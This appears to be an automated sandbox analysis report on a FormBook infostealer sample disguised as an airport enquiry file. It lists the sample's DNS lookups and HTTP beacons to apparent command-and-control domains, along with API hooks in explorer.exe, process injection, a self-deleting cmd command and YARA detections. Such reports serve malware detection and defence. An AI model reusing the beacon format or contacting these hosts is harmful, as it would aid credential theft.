          Aug 27, 2024 10:53:40.200530052 CEST | 49739 | 80 | 192.168.2.4 | 76.223.105.230
          Aug 27, 2024 10:53:40.205528021 CEST | 80 | 49739 | 76.223.105.230 | 192.168.2.4
          Aug 27, 2024 10:54:00.857664108 CEST | 49740 | 80 | 192.168.2.4 | 103.224.212.214
          Aug 27, 2024 10:54:00.862688065 CEST | 80 | 49740 | 103.224.212.214 | 192.168.2.4
          Aug 27, 2024 10:54:00.865820885 CEST | 49740 | 80 | 192.168.2.4 | 103.224.212.214
          Aug 27, 2024 10:54:00.865820885 CEST | 49740 | 80 | 192.168.2.4 | 103.224.212.214
          Aug 27, 2024 10:54:00.870647907 CEST | 80 | 49740 | 103.224.212.214 | 192.168.2.4
          Aug 27, 2024 10:54:01.369164944 CEST | 49740 | 80 | 192.168.2.4 | 103.224.212.214
          Aug 27, 2024 10:54:01.377259016 CEST | 80 | 49740 | 103.224.212.214 | 192.168.2.4
          Aug 27, 2024 10:54:01.377326012 CEST | 49740 | 80 | 192.168.2.4 | 103.224.212.214
          Aug 27, 2024 10:54:21.149645090 CEST | 49741 | 80 | 192.168.2.4 | 104.18.23.89
          Aug 27, 2024 10:54:21.154572010 CEST | 80 | 49741 | 104.18.23.89 | 192.168.2.4
          Aug 27, 2024 10:54:21.155150890 CEST | 49741 | 80 | 192.168.2.4 | 104.18.23.89
          Aug 27, 2024 10:54:21.155150890 CEST | 49741 | 80 | 192.168.2.4 | 104.18.23.89
          Aug 27, 2024 10:54:21.160027981 CEST | 80 | 49741 | 104.18.23.89 | 192.168.2.4
          Aug 27, 2024 10:54:21.640928030 CEST | 80 | 49741 | 104.18.23.89 | 192.168.2.4
          Aug 27, 2024 10:54:21.641071081 CEST | 49741 | 80 | 192.168.2.4 | 104.18.23.89
          Aug 27, 2024 10:54:21.642009974 CEST | 80 | 49741 | 104.18.23.89 | 192.168.2.4
          Aug 27, 2024 10:54:21.642054081 CEST | 49741 | 80 | 192.168.2.4 | 104.18.23.89
          Aug 27, 2024 10:54:21.645853996 CEST | 80 | 49741 | 104.18.23.89 | 192.168.2.4
          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Aug 27, 2024 10:51:36.521224022 CEST | 50707 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:51:36.535761118 CEST | 53 | 50707 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:51:56.286258936 CEST | 60957 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:51:56.787256002 CEST | 53 | 60957 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:52:16.130374908 CEST | 57005 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:52:16.175584078 CEST | 53 | 57005 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:52:57.505567074 CEST | 60278 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:52:58.423975945 CEST | 53 | 60278 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:53:18.743730068 CEST | 51430 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:53:19.739533901 CEST | 51430 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:53:20.092719078 CEST | 53 | 51430 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:53:20.092770100 CEST | 53 | 51430 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:53:39.576560020 CEST | 49709 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:53:39.616714954 CEST | 53 | 49709 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:54:00.539650917 CEST | 50752 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:54:00.849344015 CEST | 53 | 50752 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:54:21.081135035 CEST | 58537 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:54:21.148845911 CEST | 53 | 58537 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:54:41.646626949 CEST | 62939 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:54:42.681559086 CEST | 62939 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:54:43.676889896 CEST | 62939 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:54:45.717423916 CEST | 62939 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:54:47.667015076 CEST | 53 | 62939 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:54:47.667025089 CEST | 53 | 62939 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:54:47.667038918 CEST | 53 | 62939 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:54:47.667048931 CEST | 53 | 62939 | 1.1.1.1 | 192.168.2.4
          Aug 27, 2024 10:55:02.475862026 CEST | 52006 | 53 | 192.168.2.4 | 1.1.1.1
          Aug 27, 2024 10:55:02.490444899 CEST | 53 | 52006 | 1.1.1.1 | 192.168.2.4
          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
          Aug 27, 2024 10:51:36.521224022 CEST | 192.168.2.4 | 1.1.1.1 | 0xb591 | Standard query (0) | www.strategiclogisticsagency.com | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:51:56.286258936 CEST | 192.168.2.4 | 1.1.1.1 | 0x109e | Standard query (0) | www.arlatwestern.shop | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:52:16.130374908 CEST | 192.168.2.4 | 1.1.1.1 | 0xc10 | Standard query (0) | www.betbox2341.com | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:52:57.505567074 CEST | 192.168.2.4 | 1.1.1.1 | 0xabe4 | Standard query (0) | www.af28.top | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:53:18.743730068 CEST | 192.168.2.4 | 1.1.1.1 | 0x6b5f | Standard query (0) | www.wvufcw948o.top | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:53:19.739533901 CEST | 192.168.2.4 | 1.1.1.1 | 0x6b5f | Standard query (0) | www.wvufcw948o.top | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:53:39.576560020 CEST | 192.168.2.4 | 1.1.1.1 | 0xfd8f | Standard query (0) | www.wheresthechocolateat.com | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:00.539650917 CEST | 192.168.2.4 | 1.1.1.1 | 0x1e34 | Standard query (0) | www.serverdayz.com | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:21.081135035 CEST | 192.168.2.4 | 1.1.1.1 | 0xd47 | Standard query (0) | www.theselflovesite.com | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:41.646626949 CEST | 192.168.2.4 | 1.1.1.1 | 0x27c7 | Standard query (0) | www.iiixc759q.xyz | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:42.681559086 CEST | 192.168.2.4 | 1.1.1.1 | 0x27c7 | Standard query (0) | www.iiixc759q.xyz | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:43.676889896 CEST | 192.168.2.4 | 1.1.1.1 | 0x27c7 | Standard query (0) | www.iiixc759q.xyz | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:45.717423916 CEST | 192.168.2.4 | 1.1.1.1 | 0x27c7 | Standard query (0) | www.iiixc759q.xyz | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:55:02.475862026 CEST | 192.168.2.4 | 1.1.1.1 | 0xf539 | Standard query (0) | www.sliveringaf.christmas | A (IP address) | IN (0x0001) | false
          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
          Aug 27, 2024 10:51:36.535761118 CEST | 1.1.1.1 | 192.168.2.4 | 0xb591 | Name error (3) | www.strategiclogisticsagency.com | none | none | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:51:56.787256002 CEST | 1.1.1.1 | 192.168.2.4 | 0x109e | No error (0) | www.arlatwestern.shop |  | 104.18.24.121 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:52:16.175584078 CEST | 1.1.1.1 | 192.168.2.4 | 0xc10 | Server failure (2) | www.betbox2341.com | none | none | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092719078 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.wvufcw948o.top | www.baidu.com |  | CNAME (Canonical name) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092719078 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.baidu.com | www.a.shifen.com |  | CNAME (Canonical name) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092719078 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.a.shifen.com | www.wshifen.com |  | CNAME (Canonical name) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092719078 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.wshifen.com |  | 103.235.46.96 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092719078 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.wshifen.com |  | 103.235.47.188 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092770100 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.wvufcw948o.top | www.baidu.com |  | CNAME (Canonical name) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092770100 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.baidu.com | www.a.shifen.com |  | CNAME (Canonical name) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092770100 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.a.shifen.com | www.wshifen.com |  | CNAME (Canonical name) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092770100 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.wshifen.com |  | 103.235.46.96 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:53:20.092770100 CEST | 1.1.1.1 | 192.168.2.4 | 0x6b5f | No error (0) | www.wshifen.com |  | 103.235.47.188 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:53:39.616714954 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd8f | No error (0) | www.wheresthechocolateat.com | wheresthechocolateat.com |  | CNAME (Canonical name) | IN (0x0001) | false
          Aug 27, 2024 10:53:39.616714954 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd8f | No error (0) | wheresthechocolateat.com |  | 76.223.105.230 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:53:39.616714954 CEST | 1.1.1.1 | 192.168.2.4 | 0xfd8f | No error (0) | wheresthechocolateat.com |  | 13.248.243.5 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:00.849344015 CEST | 1.1.1.1 | 192.168.2.4 | 0x1e34 | No error (0) | www.serverdayz.com |  | 103.224.212.214 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:21.148845911 CEST | 1.1.1.1 | 192.168.2.4 | 0xd47 | No error (0) | www.theselflovesite.com | sites.ludicrous.cloud |  | CNAME (Canonical name) | IN (0x0001) | false
          Aug 27, 2024 10:54:21.148845911 CEST | 1.1.1.1 | 192.168.2.4 | 0xd47 | No error (0) | sites.ludicrous.cloud |  | 104.18.23.89 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:21.148845911 CEST | 1.1.1.1 | 192.168.2.4 | 0xd47 | No error (0) | sites.ludicrous.cloud |  | 104.18.22.89 | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:47.667015076 CEST | 1.1.1.1 | 192.168.2.4 | 0x27c7 | Server failure (2) | www.iiixc759q.xyz | none | none | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:47.667025089 CEST | 1.1.1.1 | 192.168.2.4 | 0x27c7 | Server failure (2) | www.iiixc759q.xyz | none | none | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:47.667038918 CEST | 1.1.1.1 | 192.168.2.4 | 0x27c7 | Server failure (2) | www.iiixc759q.xyz | none | none | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:54:47.667048931 CEST | 1.1.1.1 | 192.168.2.4 | 0x27c7 | Server failure (2) | www.iiixc759q.xyz | none | none | A (IP address) | IN (0x0001) | false
          Aug 27, 2024 10:55:02.490444899 CEST | 1.1.1.1 | 192.168.2.4 | 0xf539 | Name error (3) | www.sliveringaf.christmas | none | none | A (IP address) | IN (0x0001) | false
          • www.arlatwestern.shop
          • www.wvufcw948o.top
          • www.wheresthechocolateat.com
          • www.serverdayz.com
          • www.theselflovesite.com
          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          0 | 192.168.2.4 | 49737 | 104.18.24.121 | 80 | 2580 | C:\Windows\explorer.exe
          Timestamp | Bytes transferred | Direction | Data
          Aug 27, 2024 10:51:56.793009996 CEST | 162 | OUT | GET /pt46/?ara=0RpqK4N+sKWumQPIkFOTbgKQJXSBpFKqwGjlCYY5Ihaqw+DawbshP/fsCF3RmMSwrLNm&D8V=_FNDAz HTTP/1.1
          Host: www.arlatwestern.shop
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          1 | 192.168.2.4 | 49738 | 103.235.46.96 | 80 | 2580 | C:\Windows\explorer.exe
          Timestamp | Bytes transferred | Direction | Data
          Aug 27, 2024 10:53:20.098675966 CEST | 159 | OUT | GET /pt46/?ara=runx2q514acjuuceA0OTyKdTIzcy0YcAOvUMICEfyLgC3vUfTcW2aWKxfLyo5+IB4FDn&D8V=_FNDAz HTTP/1.1
          Host: www.wvufcw948o.top
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          2 | 192.168.2.4 | 49739 | 76.223.105.230 | 80 | 2580 | C:\Windows\explorer.exe
          Timestamp | Bytes transferred | Direction | Data
          Aug 27, 2024 10:53:39.708156109 CEST | 169 | OUT | GET /pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz HTTP/1.1
          Host: www.wheresthechocolateat.com
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:
          Aug 27, 2024 10:53:40.200354099 CEST | 418 | IN | HTTP/1.1 301 Moved Permanently
          location: https://wheresthechocolateat.com/pt46/?ara=QVbB1/DxL/c6NkCuk8rWfFSxGk6qL/qIHQ35N54fxEy/BWtxzW12LUdW++4CHG2+1qqv&D8V=_FNDAz
          vary: Accept-Encoding
          server: DPS/2.0.0+sha-1e48316
          x-version: 1e48316
          x-siteid: us-east-1
          set-cookie: dps_site_id=us-east-1; path=/
          date: Tue, 27 Aug 2024 08:53:40 GMT
          keep-alive: timeout=5
          transfer-encoding: chunked
          connection: close
          Data Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          3 | 192.168.2.4 | 49740 | 103.224.212.214 | 80 | 2580 | C:\Windows\explorer.exe
          Timestamp | Bytes transferred | Direction | Data
          Aug 27, 2024 10:54:00.865820885 CEST | 159 | OUT | GET /pt46/?ara=ssXGlCK/Wr83GZj+/MTEyAbCjYKb/LDYuNd6sJpjn9vteR/o4Disu/XP81BMj74Ur0OQ&D8V=_FNDAz HTTP/1.1
          Host: www.serverdayz.com
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:


          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
          4 | 192.168.2.4 | 49741 | 104.18.23.89 | 80 | 2580 | C:\Windows\explorer.exe
          Timestamp | Bytes transferred | Direction | Data
          Aug 27, 2024 10:54:21.155150890 CEST | 164 | OUT | GET /pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p0kwtIsH7m9&D8V=_FNDAz HTTP/1.1
          Host: www.theselflovesite.com
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:
          Aug 27, 2024 10:54:21.640928030 CEST | 555 | IN | HTTP/1.1 301 Moved Permanently
          Date: Tue, 27 Aug 2024 08:54:21 GMT
          Content-Type: text/html
          Content-Length: 167
          Connection: close
          Cache-Control: max-age=3600
          Expires: Tue, 27 Aug 2024 09:54:21 GMT
          Location: https://www.theselflovesite.com/pt46/?ara=RFlzK8LCC7FuO7cJ0ecz1aHzXPpVQPZoCqNi80z/o3n5SIq8wUQ5l6Qg5p0kwtIsH7m9&D8V=_FNDAz
          Server: cloudflare
          CF-RAY: 8b9ad620da4142d4-EWR
          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


          Code Manipulations

          Function Name | Hook Type | Active in Processes
          PeekMessageA | INLINE | explorer.exe
          PeekMessageW | INLINE | explorer.exe
          GetMessageW | INLINE | explorer.exe
          GetMessageA | INLINE | explorer.exe
          Function Name | Hook Type | New Data
          PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xEB
          PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xEB
          GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xEB
          GetMessageA | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xEB


          Target ID:0
          Start time:04:50:58
          Start date:27/08/2024
          Path:C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"
          Imagebase:0xc80000
          File size:1'120'768 bytes
          MD5 hash:621C253A4D715E3AF16FE8BE2FDD8CB1
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1688631201.0000000003AF0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low
          Has exited:true

          Target ID:1
          Start time:04:51:00
          Start date:27/08/2024
          Path:C:\Windows\SysWOW64\svchost.exe
          Wow64 process (32bit):true
          Commandline:"C:\Users\user\Desktop\New Al Maktoum International Airport Enquiry Ref #2401249.exe"
          Imagebase:0xa0000
          File size:46'504 bytes
          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1732540303.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1732135367.0000000002671000.00000020.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.1732565448.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:04:51:01
          Start date:27/08/2024
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\Explorer.EXE
          Imagebase:0x7ff72b770000
          File size:5'141'208 bytes
          MD5 hash:662F4F92FDE3557E86D110526BB578D5
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000002.00000002.4143107748.000000000E6AA000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          Reputation:high
          Has exited:false

          Target ID:3
          Start time:04:51:02
          Start date:27/08/2024
          Path:C:\Windows\SysWOW64\msiexec.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
          Imagebase:0x970000
          File size:59'904 bytes
          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4131140832.0000000004D60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4130578535.0000000003100000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.4131191580.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high
          Has exited:false

          Target ID:4
          Start time:04:51:06
          Start date:27/08/2024
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:/c del "C:\Windows\SysWOW64\svchost.exe"
          Imagebase:0x240000
          File size:236'544 bytes
          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:5
          Start time:04:51:06
          Start date:27/08/2024
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7699e0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true


            Execution Graph

            Execution Coverage:3.6%
            Dynamic/Decrypted Code Coverage:0%
            Signature Coverage:5.7%
            Total number of Nodes:2000
            Total number of Limit Nodes:162
API calls 97711->97712 97713 ce9854 97712->97713 98243 ce99be 97713->98243 97716 c8506b 74 API calls 97717 ce9881 97716->97717 97718 c8506b 74 API calls 97717->97718 97719 ce9891 97718->97719 97720 c8506b 74 API calls 97719->97720 97721 ce98ac 97720->97721 97722 c8506b 74 API calls 97721->97722 97723 ce98c7 97722->97723 97724 c85045 85 API calls 97723->97724 97725 ce98de 97724->97725 97726 ca594c _W_store_winword 58 API calls 97725->97726 97727 ce98e5 97726->97727 97728 ca594c _W_store_winword 58 API calls 97727->97728 97729 ce98ef 97728->97729 97730 c8506b 74 API calls 97729->97730 97731 ce9903 97730->97731 97732 ce9393 GetSystemTimeAsFileTime 97731->97732 97733 ce9916 97732->97733 97734 ce992b 97733->97734 97735 ce9940 97733->97735 97736 ca2f95 _free 58 API calls 97734->97736 97737 ce9946 97735->97737 97738 ce99a5 97735->97738 97740 ce9931 97736->97740 98249 ce8d90 97737->98249 97739 ca2f95 _free 58 API calls 97738->97739 97743 cbd3c1 97739->97743 97744 ca2f95 _free 58 API calls 97740->97744 97743->97420 97746 c84faa 97743->97746 97744->97743 97745 ca2f95 _free 58 API calls 97745->97743 97747 c84fb4 97746->97747 97749 c84fbb 97746->97749 97748 ca55d6 __fcloseall 83 API calls 97747->97748 97748->97749 97750 c84fca 97749->97750 97751 c84fdb FreeLibrary 97749->97751 97750->97420 97751->97750 97753 c87faf 59 API calls 97752->97753 97754 c87b5d 97753->97754 97754->97630 97804 c84d61 97755->97804 97758 c84d61 2 API calls 97761 c84d3a 97758->97761 97759 c84d4a FreeLibrary 97760 c84d53 97759->97760 97762 ca548b 97760->97762 97761->97759 97761->97760 97808 ca54a0 97762->97808 97764 c84f5c 97764->97645 97764->97646 97966 c84d94 